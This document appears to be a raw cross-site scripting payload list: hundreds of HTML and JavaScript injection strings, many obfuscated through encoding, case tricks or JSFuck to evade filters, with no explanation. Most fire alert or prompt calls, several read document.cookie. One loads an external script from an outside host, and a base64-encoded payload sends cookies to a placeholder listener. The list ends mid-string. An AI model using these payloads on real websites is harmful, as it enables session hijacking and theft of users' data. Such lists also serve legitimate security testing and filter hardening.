<img/src/onerror="this.ownerDocument.defaultView['\u0061lert'](4)">
<iframe src-doc="<svg onload=alert (1337)&nvgt;"></iframe>
&#60;body onload=alert('ibrahimxss')&#62;&#34;&#34;
onpointerover=”alert(‘XSS’)
jAvaScripT:(alert)`1`
javascript:alert('1')
#<script>alert(1)</script>
1%22onfocus=%27window.alert%28document.cookie%29%27%20autofocus=
"><form onformdata%3Dwindow.confirm(cookie)><button>XSS here<!--
#javascript:alert(2);
"><svg onload=alert(1)>
test@gmail.com%27\%22%3E%3Csvg/o...
test@gmail.com%2527%5C%2522%253E%253Csvg%2Fonload%3Dalert%28%2Fxss%2F%29%253E
//?aspxerrorpath=<script>alert(1)</script>
嘼嘾img%20src%3Dx%20onerror%3Dprompt%28document.domain%29%3B%3E
alert##<script>prompt(1234)</script>
<ScripT>alert(1234)</ScRipT>
/<script>alert(1234)</script>
<DIV+STYLE="background-image: url(javascript:alert(1))">
<IMG+DYNSRC="javascript:alert(1);">
IMG+LOWSRC="javascript:alert(1);">
<img src=asdf onerror=alert(JSON.stringify(sessionStorage))>
<iframe src="javascript:alert(document.domain)"></iframe>
/me/m%3C/script%3E%3Csvg/onload=prompt(document.domain)%3E
<isindex+type=image+src=1+onerror=alert(1)>
<img src=x onerror="alert(origin)">
"*alert(1)*"
ibro"*alert(1)*"
alert?.(1) 
<script>eval('al'+'ert(1)');</script>
'alert(1)'.replace(/.+/,eval)
<img src/onerror=alert(1)>
<img onfocus=alert(1) autofocus tabindex=1>	
<p onfocus=alert(1) autofocus tabindex=1>	
<form onfocus=alert(1) autofocus tabindex=1>	
<svg onfocus=alert(1) autofocus tabindex=1>	
<wbr onfocus=alert(1) autofocus tabindex=1>	
<hgroup onfocus=alert(1) autofocus tabindex=1>	
<ul onfocus=alert(1) autofocus tabindex=1>	
<video onfocus=alert(1) autofocus tabindex=1>	
<mark onfocus=alert(1) autofocus tabindex=1>	
<h1 onfocus=alert(1) autofocus tabindex=1>
<xss onfocus=alert(1) autofocus tabindex=1>
<body onhashchange="print()">	
<plaintext onfocus=alert(1) autofocus tabindex=1>	
<video controls src=1 onfocus=alert(1) autofocus>	
<svg><image href=1 onerror=alert(1)>	
<audio src/onerror=alert(1)>	
<ol onfocus=alert(1) autofocus tabindex=1>	
<image2 onfocus=alert(1) autofocus tabindex=1>	
alert(document['cookie'])
<svg/onload=parent[/al/.source+/ert/.source] (1)>
<svg/onload=parent[/al/.source.concat(/ert/.source)] (2)>
"><img src=x onafterprint=prompt(document.domain);>
<img onerror=eval('al&#x5c;u0065rt(1)') src=a>
"><div onpointerrawupdate="console.log('XSS')">Click_Here_Click_Here_Click_Here_Click_Here_Click_Here_Click_Here_Click_Here_ClickHere</div>
"><div onpointerrawupdate="console.log('XSS')"></div><!--
<video onloadstart=alert()><source></*>
<xss draggable="true" ondragexit-alert()>test</xss>
(A(%22onerror='alert%60123%60'test))/
"aaa&#x3C;a href=javas&#x26;#99;ript:alert(1)&#x3E;click"
"><form onformdata=window.confirm(document.cookie)><!--
a'-alert(1)//
';document.addEventListener('DOMContentLoaded', function(){var c = function(){a();};var s = document.createElement('script');s.src = 'https://n.0x7359.com/xss.js';s.onreadystatechange = c;document.body.appendChild(s);});//
';alert(document.cookie)//
<svg/onload​=alert/*1337*/(1)>
<svg/onload​=alert//&NewLine;(2)>
<svg/onload​=alert&sol;**&sol;(3)>
<svg/onload​=alert/&#42;&#42;/(4)>
<svg/onload​=alert&#x2F;**&#47;(5)>
confirm?.(1) 
ignition/scripts/--><svg%20onload=alert%28document.domain%29>
<svg%20onload=alert%28document.domain%29>
<script ~~~>alert(0%0)</script ~~~>
"ontouchend%3Dprompt%281%29+class%3Dd3rk+
"><svg onScroll="javascript:alert(1)//
"<!--><Svg OnLoad=confirm?.(/d3rk😈/)<!--1")"<!--><Svg+OnLoad=confirm?.(/d3rk😈/)<!--
%22%3C!--%3E%3CSvg%20OnLoad=confirm?.(/d3rk%F0%9F%98%88/)%3C!--1%22%29%22%3C%21--%3E%3CSvg+OnLoad%3Dconfirm%3f%2e%28%2fd3rk%F0%9F%98%88%2f%29%3C%21--
url=%26%2302java%26%23115cript:alert(document.domain)
%26%2302java%26%23115cript:alert(document.domain)
">>>>>><marquee>RXSS</marquee></head><abc%3E</script><script>alert(document.cookie)</script><meta
“><iMg SrC=x onError​=prompt()>
"><​script>prompt()<​/script>
<Svg On Only=1 Onload=alert("hex")>
"><script>alert(document.cookie)</script>
<<​script>script>prompt()<​/script>
<svg/onload​=prompt()>
<Svg On Only=1 Onload=alert(1)>
<details x=xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx:2 open ontoggle=&#x0000000000061;lert&#x000000028;origin&#x000029;>
<IFRAME SRC="javascript:alert(document.cookie);"></IFRAME>
<!</textarea <body onload='alert(1)'>
<INPUT+TYPE="IMAGE"+SRC="javascript:alert(1);">
themecolor=%22-alert('XSS')-%22
<STYLE>li+{list-style-image:url("javascript:alert(1)");}</STYLE><UL><LI>
"><a>a</a><img src=x onerror=alert(document.cookie)>{{9-9}}';alert(0);://
#'%26%26'javascript:alert%25281%2529//
</a onmousemove="alert(1)">
<svg onload=alert (1337)&nvgt;
<img/src/onerror="(function(x){this[x+`ert`](1)})`al`">
<img/src/onerror="window[`al+/e/[`ex + `ec`]`e`+`rt`](2)">
<img/src/onerror="this.ownerDocument.defaultView['\u0061lert'](4)">
<iframe src-doc="<svg onload=alert (1337)&nvgt;"></iframe>
&#60;body onload=alert('ibrahimxss')&#62;&#34;&#34;
onpointerover=”alert(‘XSS’)
jAvaScripT:(alert)`1`
javascript:alert('1')
"onpointerover=”alert(‘XSS’)
10</option></select><img/src=xon=()onx+honerror=alert(1)>ss<svg/onload=prompt(document.domain)%20>
<img/src=xon=()onx+honerror=alert(1)>ss<svg/onload=prompt(document.domain)%20>
onclick=”alert(‘XSS’)
onmouseover=”alert(‘XSS’)
onload=”alert(‘XSS’)
onerror=”alert(‘XSS’)
onfocus=”alert(‘XSS’)
onblur=”alert(‘XSS’)
onchange=”alert(‘XSS’)
oninput=”alert(‘XSS’)
onsubmit=”alert(‘XSS’)
onkeydown=”alert(‘XSS’)
onkeydown=”alert(‘XSS’)
onpointerover=”alert(‘XSS’)
<img src=x:alert(alt) onerror=eval(src) alt=0>
<img src=/ onerror=alert(1)>
3Cscript%3Ealert(1)%3C%2Fscript%3E##1
%3c%73%63%72%69%70%74%3e%61%6c%65%72%74%28%31%29%3c%2f%73%63%72%69%70%74%3e
%C0%BCscript%C0%BEalert(1)%C0%BC/script%C0%BE
//";alert(String.fromCharCode(88,83,83))
<svg onload=prompt&#0000000040document.domain)>"
%";eval(unescape(location))//#%0Aprompt(0)
<SCRIPT>a=/XSS/%0Aalert(a.source)</SCRIPT
"><script&#x00000003B;alert&#x000000028;1&#x000000029;&#x00000003B;</script>
javascript&#x00000003A;alert&#x000000028;2&#x000000029;&#x00000003B;
"><img src=1 onerror=alert&#x000000028;1&#x000000029;&#x00000003B;">
";eval(unescape(location))//# %0Aalert(0)
¼script¾alert(¢XSS¢)¼/script¾
<img src=1 onerror=alert(1)>
&#x3C;img src=1 onerror=alert(1)&#x3E;
%2527%253E%253Cscript%253Ealert%25281%2529%253C%252Fscript%253E
%2527%2520onfocus%253D%2527alert%25281%2529%2527%2520
‘ onfocus=’alert(1)’
‘ onfocus=’alert(1)’ autofocus=’
%2527%2520onfocus%253D%2527alert%25281%2529%2527%2520autofocus%253D%2527
‘ onmouseover=’alert(1)’
%2527%2520onmouseover%253D%2527alert%25281%2529%2527%2520
<svg%20oNinad=1%20onload=alert(document.cookie)>
?utm_source=abc%60%3breturn+false%7d%29%3b%7d%29%3balert%60xss%60;%3c%2f%73%63%72%69%70%74%3e
<a+HREF="%26%237 javascrip%26%239t: alert%261par;document .domain) *>
”/>&_lt;_script>alert(1)&_lt;/scr_ipt>”/>
<a&#32;href&#61;&#91;&#00;&#93;"&#00; onmouseover=prompt&#40;1&#41;&#47;&#47;">XYZ</a>
<script /***/>/***/confirm('\uFF41\uFF4C\uFF45\uFF52\uFF54\u1455\uFF11\u1450')/***/</script /***/
<script>var a=document.createElement("a");a.href="data:text/html;base64,PHNjcmlwdD5hbGVydCgxKTwvc2NyaXB0Pg==";http://a.click();</script>
%script%alert(CXSS¢)4/script%
<DIV STYLE="background-image: url(&#1,javascript:alert('XSS))">
STYLE="xss:expr/*XSS*/ession(alert('XSS')">
<XSS STYLE="Xss:expressionfalert('XSS'))">
xss:&#101;x&#x2F; *XSS*//*//pression(alert("XSS"))'>
"<svg onload=alert (1)> " ;
%3Csvg%2Fonload%3Dalert%28%22XSS%22%29%20%3E
#<img src=1 onerror=alert(1)>
<a/href=javascript&colon;alert()>click
<body onload="eval(atob('YWxlcnQoJ1N1Y2Nlc3NmdWwgWFNTJyk='))">
<a href="javascript&#0000058&#0000097lert('Successful XSS')">Click this link!</a>
<iframe src=# onmouseover=alert(String.fromCharCode(88,83,83))></iframe>
<img src="java    script:al ert('Successful XSS')">
<img src="java	script:al	ert('Successful XSS')">
<a href="  &#x8; &#23;   javascript:alert('Successful XSS')">Click this link!</a>
<scr<script>ipt>document.write("Successful XSS")</scr<script>ipt>
<img/src="funny.jpg"onload=javascript:eval(alert('Successful&#32XSS'))>
<a href='vbscript:MsgBox("Successful XSS")'>Click here</a>
<img dynsrc="javascript:alert('Successful XSS')">
<img src=`javascript:alert("The name is 'XSS'")`>
<body background="javascript:alert('Successful XSS')">
"><input autofocus onfocus =top[(584390752*16).toString(32-1*2)](/XSS/)>
'onfocus='alert(1)' autofocus='
<xml onreadystatechange=alert(1)>
&fileName=')},1000);alert("XSS`);//
fileName=')},1000);alert("XSS`);//
<style onreadystatechange=alert(1)>
<script onreadystatechange=alert(1)>
<bgsound onpropertychange=alert(1)>
<body onactivate=alert(1)>
<body onfocusin=alert(1)>
<div style="background-image:url(javascript:alert('Successful XSS'))">
<input type="image" src="javascript:alert('Successful XSS')">
%26%23x2f%3B%26%23x2f%3Br4y.pw
<a/href=&#74;ava%0a%0d%09script&colon;alert()>click
<d3v/onauxclick=(((confirm)))``>click
"/><iMg SrC="x" oNeRRor="alert(document.cookie);">
svg/onload=alert(document.cookie...
<img src="non-existent-image.jpg" onerror="alert(document.cookie);" />
[alert][0].call(this,1)
&lt;script&gt;alert(1)&lt;/script&gt;
%26lt%3Bscript%26gt%3Balert%281%29%26lt%3B%2Fscript%26gt%3B
&amp;lt;script&amp;gt;alert(1)&amp;lt;/script&amp;gt;
%26amp%3Blt%3Bscript%26amp%3Bgt%3Balert%281%29%26amp%3Blt%3B%2Fscript%26amp%3Bgt%3B
<d3v/onmouseleave=[2].some(confirm)>click
<details/open/ontoggle=alert()>
<details/open/ontoggle=(confirm)()//
";[][“\146\151\154\164\145\162”][“\143\157\156\163\164\162\165\143\164\157\162”](“\145\166\141\154\50\141\164\157\142\50\42\131\127\170\154\143\156\121\157\115\123\153\75\42\51\51”)();var+test="
”al”;b=”ert”;self[a+b]();
a=”Fun”;b=”ction”;c=”ev”;d=”al(a”;e=”tob”;f=”(‘YWxlcnQoMSk=’))”;self[a+b](c+d+e+f)();
"><svg%20onload=alert%26%230000000040"1")>
<img/src=x onError="`${x}`;alert(`XSS`);">
-top['al\x65rt']('xss')-
<svg/on%20onload=alert(1)>
eval(function(p,a,c,k,e,d){e=function(c){return c};if(!''.replace(/^/,String)){while(c--){d[c]=k[c]||c}k=[function(e){return d[e]}];e=function(){return'\\w+'};c=1};while(c--){if(k[c]){p=p.replace(new RegExp('\\b'+e(c)+'\\b','g'),k[c])}}return p}('0:2(1)',3,3,'javascript||alert'.split('|'),0,{}))
_0x68087f:alert(0x1);
/?xss=500); alert(document.cookie);//
data:text/html;base64,PHNjcmlwdD5hbGVydCgnWFNTJyk8L3NjcmlwdD4=
"></SCRIPT>”>’><SCRIPT>alert(String.fromCharCode(88,83,83))</SCRIPT>
"><iframe src="javascript:alert(XSS)">
<object data="javascript:alert(XSS)">
<isindex type=image src=1 onerror=alert(XSS)>
<DIV STYLE="background-image: url(javascript:alert('XSS'))">
<DIV STYLE="background-image:\0075\0072\006C\0028'\006a\0061\0076\0061\0073\0063\0072\0069\0070\0074\003a\0061\006c\0065\0072\0074\0028.1027\0058.1053\0053\0027\0029'\0029">
<DIV STYLE="background-image: url( javascript:alert('XSS'))">
<DIV STYLE="width: expression(alert('XSS'));">
<BASE HREF="javascript:alert('XSS');//">
<EMBED SRC="data:image/svg+xml;base64,PHN2ZyB4bWxuczpzdmc9Imh0dH A6Ly93d3cudzMub3JnLzIwMDAvc3ZnIiB4bWxucz0iaHR0cDovL3d3dy53My5vcmcv MjAwMC9zdmciIHhtbG5zOnhsaW5rPSJodHRwOi8vd3d3LnczLm9yZy8xOTk5L3hs aW5rIiB2ZXJzaW9uPSIxLjAiIHg9IjAiIHk9IjAiIHdpZHRoPSIxOTQiIGhlaWdodD0iMjAw IiBpZD0ieHNzIj48c2NyaXB0IHR5cGU9InRleHQvZWNtYXNjcmlwdCI+YWxlcnQoIlh TUyIpOzwvc2NyaXB0Pjwvc3ZnPg==" type="image/svg+xml" AllowScriptAccess="always"></EMBED>
<?php echo('<SCR'); echo('IPT>alert("XSS")</SCRIPT>'); ?>
<META HTTP-EQUIV="Set-Cookie" Content="USERID=<SCRIPT>alert('XSS')</SCRIPT>">
/\<script((\\s+\\w+(\\s\*=\\s\*(?:"(.)\*?"|'(.)\*?'|\[^'"\>\\s\]+))?)+\\s\*|\\s\*)src/i
<A HREF="http://%77%77%77%2E%67%6F%6F%67%6C%65%2E%63%6F%6D">XSS</A>
<img onload="eval(atob('ZG9jdW1lbnQubG9jYXRpb249Imh0dHA6Ly9saXN0ZXJuSVAvIitkb2N1bWVudC5jb29raWU='))">
<A HREF="javascript:document.location='http://www.google.com/'">XSS</A>
"><img src=1 onmouseleave=print()>
<IMG SRC=&#106;&#97;&#118;&#97;&#115;&#99;&#114;&#105;&#112;&#116;&#58;&#97;&#108;&#101;&#114;&#116;&#40;&#39;&#88;&#83;&#83;&#39;&#41;>
%5B%5D%5B%28%21%5B%5D%2B%5B%5D%29%5B%2B%5B%5D%5D%2B%28%21%5B%5D%2B%5B%5D%29%5B%21%2B%5B%5D%2B%21%2B%5B%5D%5D%2B%28%21%5B%5D%2B%5B%5D%29%5B%2B%21%2B%5B%5D%5D%2B%28%21%21%5B%5D%2B%5B%5D%29%5B%2B%5B%5D%5D%5D%5B%28%5B%5D%5B%28%21%5B%5D%2B%5B%5D%29%5B%2B%5B%5D%5D%2B%28%21%5B%5D%2B%5B%5D%29%5B%21%2B%5B%5D%2B%21%2B%5B%5D%5D%2B%28%21%5B%5D%2B%5B%5D%29%5B%2B%21%2B%5B%5D%5D%2B%28%21%21%5B%5D%2B%5B%5D%29%5B%2B%5B%5D%5D%5D%2B%5B%5D%29%5B%21%2B%5B%5D%2B%21%2B%5B%5D%2B%21%2B%5B%5D%5D%2B%28%21%21%5B%5D%2B%5B%5D%5B%28%21%5B%5D%2B%5B%5D%29%5B%2B%5B%5D%5D%2B%28%21%5B%5D%2B%5B%5D%29%5B%21%2B%5B%5D%2B%21%2B%5B%5D%5D%2B%28%21%5B%5D%2B%5B%5D%29%5B%2B%21%2B%5B%5D%5D%2B%28%21%21%5B%5D%2B%5B%5D%29%5B%2B%5B%5D%5D%5D%29%5B%2B%21%2B%5B%5D%2B%5B%2B%5B%5D%5D%5D%2B%28%5B%5D%5B%5B%5D%5D%2B%5B%5D%29%5B%2B%21%2B%5B%5D%5D%2B%28%21%5B%5D%2B%5B%5D%29%5B%21%2B%5B%5D%2B%21%2B%5B%5D%2B%21%2B%5B%5D%5D%2B%28%21%21%5B%5D%2B%5B%5D%29%5B%2B%5B%5D%5D%2B%28%21%21%5B%5D%2B%5B%5D%29%5B%2B%21%2B%5B%5D%5D%2B%28%5B%5D%5B%5B%5D%5D%2B%5B%5D%29%5B%2B%5B%5D%5D%2B%28%5B%5D%5B%28%21%5B%5D%2B%5B%5D%29%5B%2B%5B%5D%5D%2B%28%21%5B%5D%2B%5B%5D%29%5B%21%2B%5B%5D%2B%21%2B%5B%5D%5D%2B%28%21%5B%5D%2B%5B%5D%29%5B%2B%21%2B%5B%5D%5D%2B%28%21%21%5B%5D%2B%5B%5D%29%5B%2B%5B%5D%5D%5D%2B%5B%5D%29%5B%21%2B%5B%5D%2B%21%2B%5B%5D%2B%21%2B%5B%5D%5D%2B%28%21%21%5B%5D%2B%5B%5D%29%5B%2B%5B%5D%5D%2B%28%21%21%5B%5D%2B%5B%5D%5B%28%21%5B%5D%2B%5B%5D%29%5B%2B%5B%5D%5D%2B%28%21%5B%5D%2B%5B%5D%29%5B%21%2B%5B%5D%2B%21%2B%5B%5D%5D%2B%28%21%5B%5D%2B%5B%5D%29%5B%2B%21%2B%5B%5D%5D%2B%28%21%21%5B%5D%2B%5B%5D%29%5B%2B%5B%5D%5D%5D%29%5B%2B%21%2B%5B%5D%2B%5B%2B%5B%5D%5D%5D%2B%28%21%21%5B%5D%2B%5B%5D%29%5B%2B%21%2B%5B%5D%5D%5D%28%28%21%21%5B%5D%2B%5B%5D%29%5B%2B%21%2B%5B%5D%5D%2B%28%21%21%5B%5D%2B%5B%5D%29%5B%21%2B%5B%5D%2B%21%2B%5B%5D%2B%21%2B%5B%5D%5D%2B%28%21%21%5B%5D%2B%5B%5D%29%5B%2B%5B%5D%5D%2B%28%5B%5D%5B%5B%5D%5D%2B%5B%5D%29%5B%2B%5B%5D%5D%2B%28%21%21%5B%5D%2B%5B%5D%29%5B%2B%21%2B%5B%5D%5D%2B%28%5B%5D%5B%5B%5D%5D%2B%5B%5D%29%5B%2B%21%2B%5B%5D%5D%2B%28%2B%5B%21%5B%5D%5D%2B%5B%5D%5B%28%21%5B%5D%2B%5B%5D%29%5B%2B%5B%5D%5D%2B%28%21%5B%5D%2B%5B%5D%29%5B%21%2B%5B%5D%2B%21%2B%5B%5D%5D%2B%28%21%5B%5D%2B%5B%5D%29%5B%2B%21%2B%5B%5D%5D%2B%28%21%21%5B%5D%2B%5B%5D%29%5B%2B%5B%5D%5D%5D%29%5B%2B%21%2B%5B%5D%2B%5B%2B%21%2B%5B%5D%5D%5D%2B%28%21%21%5B%5D%2B%5B%5D%29%5B%21%2B%5B%5D%2B%21%2B%5B%5D%2B%21%2B%5B%5D%5D%2B%28%2B%28%21%2B%5B%5D%2B%21%2B%5B%5D%2B%21%2B%5B%5D%2B%5B%2B%21%2B%5B%5D%5D%29%29%5B%28%21%21%5B%5D%2B%5B%5D%29%5B%2B%5B%5D%5D%2B%28%21%21%5B%5D%2B%5B%5D%5B%28%21%5B%5D%2B%5B%5D%29%5B%2B%5B%5D%5D%2B%28%21%5B%5D%2B%5B%5D%29%5B%21%2B%5B%5D%2B%21%2B%5B%5D%5D%2B%28%21%5B%5D%2B%5B%5D%29%5B%2B%21%2B%5B%5D%5D%2B%28%21%21%5B%5D%2B%5B%5D%29%5B%2B%5B%5D%5D%5D%29%5B%2B%21%2B%5B%5D%2B%5B%2B%5B%5D%5D%5D%2B%28%5B%5D%2B%5B%5D%29%5B%28%5B%5D%5B%28%21%5B%5D%2B%5B%5D%29%5B%2B%5B%5D%5D%2B%28%21%5B%5D%2B%5B%5D%29%5B%21%2B%5B%5D%2B%21%2B%5B%5D%5D%2B%28%21%5B%5D%2B%5B%5D%29%5B%2B%21%2B%5B%5D%5D%2B%28%21%21%5B%5D%2B%5B%5D%29%5B%2B%5B%5D%5D%5D%2B%5B%5D%29%5B%21%2B%5B%5D%2B%21%2B%5B%5D%2B%21%2B%5B%5D%5D%2B%28%21%21%5B%5D%2B%5B%5D%5B%28%21%5B%5D%2B%5B%5D%29%5B%2B%5B%5D%5D%2B%28%21%5B%5D%2B%5B%5D%29%5B%21%2B%5B%5D%2B%21%2B%5B%5D%5D%2B%28%21%5B%5D%2B%5B%5D%29%5B%2B%21%2B%5B%5D%5D%2B%28%21%21%5B%5D%2B%5B%5D%29%5B%2B%5B%5D%5D%5D%29%5B%2B%21%2B%5B%5D%2B%5B%2B%5B%5D%5D%5D%2B%28%5B%5D%5B%5B%5D%5D%2B%5B%5D%29%5B%2B%21%2B%5B%5D%5D%2B%28%21%5B%5D%2B%5B%5D%29%5B%21%2B%5B%5D%2B%21%2B%5B%5D%2B%21%2B%5B%5D%5D%2B%28%21%21%5B%5D%2B%5B%5D%29%5B%2B%5B%5D%5D%2B%28%21%21%5B%5D%2B%5B%5D%29%5B%2B%21%2B%5B%5D%5D%2B%28%5B%5D%5B%5B%5D%5D%2B%5B%5D%29%5B%2B%5B%5D%5D%2B%28%5B%5D%5B%28%21%5B%5D%2B%5B%5D%29%5B%2B%5B%5D%5D%2B%28%21%5B%5D%2B%5B%5D%29%5B%21%2B%5B%5D%2B%21%2B%5B%5D%5D%2B%28%21%5B%5D%2B%5B%5D%29%5B%2B%21%2B%5B%5D%5D%2B%28%21%21%5B%5D%2B%5B%5D%29%5B%2B%5B%5D%5D%5D%2B%5B%5D%29%5B%21%2B%5B%5D%2B%21%2B%5B%5D%2B%21%2B%5B%5D%5D%2B%28%21%21%5B%5D%2B%5B%5D%29%5B%2B%5B%5D%5D%2B%28%21%21%5B%5D%2B%5B%5D%5B%28%21%5B%5D%2B%5B%5D%29%5B%2B%5B%5D%5D%2B%28%21%5B%5D%2B%5B%5D%29%5B%21%2B%5B%5D%2B%21%2B%5B%5D%5D%2B%28%21%5B%5D%2B%5B%5D%29%5B%2B%21%2B%5B%5D%5D%2B%28%21%21%5B%5D%2B%5B%5D%29%5B%2B%5B%5D%5D%5D%29%5B%2B%21%2B%5B%5D%2B%5B%2B%5B%5D%5D%5D%2B%28%21%21%5B%5D%2B%5B%5D%29%5B%2B%21%2B%5B%5D%5D%5D%5B%28%5B%5D%5B%5B%5D%5D%2B%5B%5D%29%5B%2B%21%2B%5B%5D%5D%2B%28%21%5B%5D%2B%5B%5D%29%5B%2B%21%2B%5B%5D%5D%2B%28%28%2B%5B%5D%29%5B%28%5B%5D%5B%28%21%5B%5D%2B%5B%5D%29%5B%2B%5B%5D%5D%2B%28%21%5B%5D%2B%5B%5D%29%5B%21%2B%5B%5D%2B%21%2B%5B%5D%5D%2B%28%21%5B%5D%2B%5B%5D%29%5B%2B%21%2B%5B%5D%5D%2B%28%21%21%5B%5D%2B%5B%5D%29%5B%2B%5B%5D%5D%5D%2B%5B%5D%29%5B%21%2B%5B%5D%2B%21%2B%5B%5D%2B%21%2B%5B%5D%5D%2B%28%21%21%5B%5D%2B%5B%5D%5B%28%21%5B%5D%2B%5B%5D%29%5B%2B%5B%5D%5D%2B%28%21%5B%5D%2B%5B%5D%29%5B%21%2B%5B%5D%2B%21%2B%5B%5D%5D%2B%28%21%5B%5D%2B%5B%5D%29%5B%2B%21%2B%5B%5D%5D%2B%28%21%21%5B%5D%2B%5B%5D%29%5B%2B%5B%5D%5D%5D%29%5B%2B%21%2B%5B%5D%2B%5B%2B%5B%5D%5D%5D%2B%28%5B%5D%5B%5B%5D%5D%2B%5B%5D%29%5B%2B%21%2B%5B%5D%5D%2B%28%21%5B%5D%2B%5B%5D%29%5B%21%2B%5B%5D%2B%21%2B%5B%5D%2B%21%2B%5B%5D%5D%2B%28%21%21%5B%5D%2B%5B%5D%29%5B%2B%5B%5D%5D%2B%28%21%21%5B%5D%2B%5B%5D%29%5B%2B%21%2B%5B%5D%5D%2B%28%5B%5D%5B%5B%5D%5D%2B%5B%5D%29%5B%2B%5B%5D%5D%2B%28%5B%5D%5B%28%21%5B%5D%2B%5B%5D%29%5B%2B%5B%5D%5D%2B%28%21%5B%5D%2B%5B%5D%29%5B%21%2B%5B%5D%2B%21%2B%5B%5D%5D%2B%28%21%5B%5D%2B%5B%5D%29%5B%2B%21%2B%5B%5D%5D%2B%28%21%21%5B%5D%2B%5B%5D%29%5B%2B%5B%5D%5D%5D%2B%5B%5D%29%5B%21%2B%5B%5D%2B%21%2B%5B%5D%2B%21%2B%5B%5D%5D%2B%28%21%21%5B%5D%2B%5B%5D%29%5B%2B%5B%5D%5D%2B%28%21%21%5B%5D%2B%5B%5D%5B%28%21%5B%5D%2B%5B%5D%29%5B%2B%5B%5D%5D%2B%28%21%5B%5D%2B%5B%5D%29%5B%21%2B%5B%5D%2B%21%2B%5B%5D%5D%2B%28%21%5B%5D%2B%5B%5D%29%5B%2B%21%2B%5B%5D%5D%2B%28%21%21%5B%5D%2B%5B%5D%29%5B%2B%5B%5D%5D%5D%29%5B%2B%21%2B%5B%5D%2B%5B%2B%5B%5D%5D%5D%2B%28%21%21%5B%5D%2B%5B%5D%29%5B%2B%21%2B%5B%5D%5D%5D%2B%5B%5D%29%5B%2B%21%2B%5B%5D%2B%5B%2B%21%2B%5B%5D%5D%5D%2B%28%21%21%5B%5D%2B%5B%5D%29%5B%21%2B%5B%5D%2B%21%2B%5B%5D%2B%21%2B%5B%5D%5D%5D%5D%28%21%2B%5B%5D%2B%21%2B%5B%5D%2B%21%2B%5B%5D%2B%5B%21%2B%5B%5D%2B%21%2B%5B%5D%5D%29%2B%28%21%5B%5D%2B%5B%5D%29%5B%2B%21%2B%5B%5D%5D%2B%28%21%5B%5D%2B%5B%5D%29%5B%21%2B%5B%5D%2B%21%2B%5B%5D%5D%29%28%29%28%28%5B%5D%5B%28%21%21%5B%5D%2B%5B%5D%29%5B%21%2B%5B%5D%2B%21%2B%5B%5D%2B%21%2B%5B%5D%5D%2B%28%5B%5D%5B%5B%5D%5D%2B%5B%5D%29%5B%2B%21%2B%5B%5D%5D%2B%28%21%21%5B%5D%2B%5B%5D%29%5B%2B%5B%5D%5D%2B%28%21%21%5B%5D%2B%5B%5D%29%5B%2B%21%2B%5B%5D%5D%2B%28%5B%21%5B%5D%5D%2B%5B%5D%5B%5B%5D%5D%29%5B%2B%21%2B%5B%5D%2B%5B%2B%5B%5D%5D%5D%2B%28%21%21%5B%5D%2B%5B%5D%29%5B%21%2B%5B%5D%2B%21%2B%5B%5D%2B%21%2B%5B%5D%5D%2B%28%21%5B%5D%2B%5B%5D%29%5B%21%2B%5B%5D%2B%21%2B%5B%5D%2B%21%2B%5B%5D%5D%5D%28%29%2B%5B%5D%29%5B%21%2B%5B%5D%2B%21%2B%5B%5D%2B%21%2B%5B%5D%5D%2B%28%21%5B%5D%2B%5B%5D%29%5B%2B%21%2B%5B%5D%5D%2B%28%2B%28%21%2B%5B%5D%2B%21%2B%5B%5D%2B%21%2B%5B%5D%2B%5B%2B%21%2B%5B%5D%5D%29%29%5B%28%21%21%5B%5D%2B%5B%5D%29%5B%2B%5B%5D%5D%2B%28%21%21%5B%5D%2B%5B%5D%5B%28%21%5B%5D%2B%5B%5D%29%5B%2B%5B%5D%5D%2B%28%21%5B%5D%2B%5B%5D%29%5B%21%2B%5B%5D%2B%21%2B%5B%5D%5D%2B%28%21%5B%5D%2B%5B%5D%29%5B%2B%21%2B%5B%5D%5D%2B%28%21%21%5B%5D%2B%5B%5D%29%5B%2B%5B%5D%5D%5D%29%5B%2B%21%2B%5B%5D%2B%5B%2B%5B%5D%5D%5D%2B%28%5B%5D%2B%5B%5D%29%5B%28%5B%5D%5B%28%21%5B%5D%2B%5B%5D%29%5B%2B%5B%5D%5D%2B%28%21%5B%5D%2B%5B%5D%29%5B%21%2B%5B%5D%2B%21%2B%5B%5D%5D%2B%28%21%5B%5D%2B%5B%5D%29%5B%2B%21%2B%5B%5D%5D%2B%28%21%21%5B%5D%2B%5B%5D%29%5B%2B%5B%5D%5D%5D%2B%5B%5D%29%5B%21%2B%5B%5D%2B%21%2B%5B%5D%2B%21%2B%5B%5D%5D%2B%28%21%21%5B%5D%2B%5B%5D%5B%28%21%5B%5D%2B%5B%5D%29%5B%2B%5B%5D%5D%2B%28%21%5B%5D%2B%5B%5D%29%5B%21%2B%5B%5D%2B%21%2B%5B%5D%5D%2B%28%21%5B%5D%2B%5B%5D%29%5B%2B%21%2B%5B%5D%5D%2B%28%21%21%5B%5D%2B%5B%5D%29%5B%2B%5B%5D%5D%5D%29%5B%2B%21%2B%5B%5D%2B%5B%2B%5B%5D%5D%5D%2B%28%5B%5D%5B%5B%5D%5D%2B%5B%5D%29%5B%2B%21%2B%5B%5D%5D%2B%28%21%5B%5D%2B%5B%5D%29%5B%21%2B%5B%5D%2B%21%2B%5B%5D%2B%21%2B%5B%5D%5D%2B%28%21%21%5B%5D%2B%5B%5D%29%5B%2B%5B%5D%5D%2B%28%21%21%5B%5D%2B%5B%5D%29%5B%2B%21%2B%5B%5D%5D%2B%28%5B%5D%5B%5B%5D%5D%2B%5B%5D%29%5B%2B%5B%5D%5D%2B%28%5B%5D%5B%28%21%5B%5D%2B%5B%5D%29%5B%2B%5B%5D%5D%2B%28%21%5B%5D%2B%5B%5D%29%5B%21%2B%5B%5D%2B%21%2B%5B%5D%5D%2B%28%21%5B%5D%2B%5B%5D%29%5B%2B%21%2B%5B%5D%5D%2B%28%21%21%5B%5D%2B%5B%5D%29%5B%2B%5B%5D%5D%5D%2B%5B%5D%29%5B%21%2B%5B%5D%2B%21%2B%5B%5D%2B%21%2B%5B%5D%5D%2B%28%21%21%5B%5D%2B%5B%5D%29%5B%2B%5B%5D%5D%2B%28%21%21%5B%5D%2B%5B%5D%5B%28%21%5B%5D%2B%5B%5D%29%5B%2B%5B%5D%5D%2B%28%21%5B%5D%2B%5B%5D%29%5B%21%2B%5B%5D%2B%21%2B%5B%5D%5D%2B%28%21%5B%5D%2B%5B%5D%29%5B%2B%21%2B%5B%5D%5D%2B%28%21%21%5B%5D%2B%5B%5D%29%5B%2B%5B%5D%5D%5D%29%5B%2B%21%2B%5B%5D%2B%5B%2B%5B%5D%5D%5D%2B%28%21%21%5B%5D%2B%5B%5